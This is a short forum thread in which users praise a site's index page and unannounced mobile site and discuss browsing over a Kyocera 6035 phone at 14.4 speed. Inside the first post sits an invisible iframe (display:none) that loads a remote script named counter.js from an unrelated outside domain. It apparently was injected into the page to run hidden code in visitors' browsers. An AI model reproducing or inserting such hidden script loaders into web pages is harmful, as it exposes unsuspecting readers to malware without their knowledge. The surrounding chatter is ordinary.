+ Reply to Thread

The index is awesome!

The index rocks! It's the only place I need to go to keep up with everything that's going on.... no more having to go into every forum to see if there are new threads! And the new mobile site (that hasn't been announced yet, has it? Oops!) loads so fast on my 6035... and I use it on my home computer too since I'm connecting with my 6035 as the modem! Pages load in just seconds!

You da Man JJ! :clap<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

Robert, don't you have a built in 56k modem that would be faster than the slow 14.4 on the 6035?

Administrator
    yes he does, but he has minutes to burn!

Originally posted by pdageek
    Robert, don't you have a built in 56k modem that would be faster than the slow 14.4 on the 6035?
    Actually, I have a cable/analog modem combo..... all I'm missing is a land line or a cable Internet connection

I just don't feel like paying for either.... I have T1 at work and that's where I use the Internet the most.... although I do use most of my 3,000 N&W minutes :drink1
    Please visit my picture site: Robert-O-Rama :)

The mobile site is a lot faster than browsing the normal site. Do you use the index exclusively while browsing at 14.4?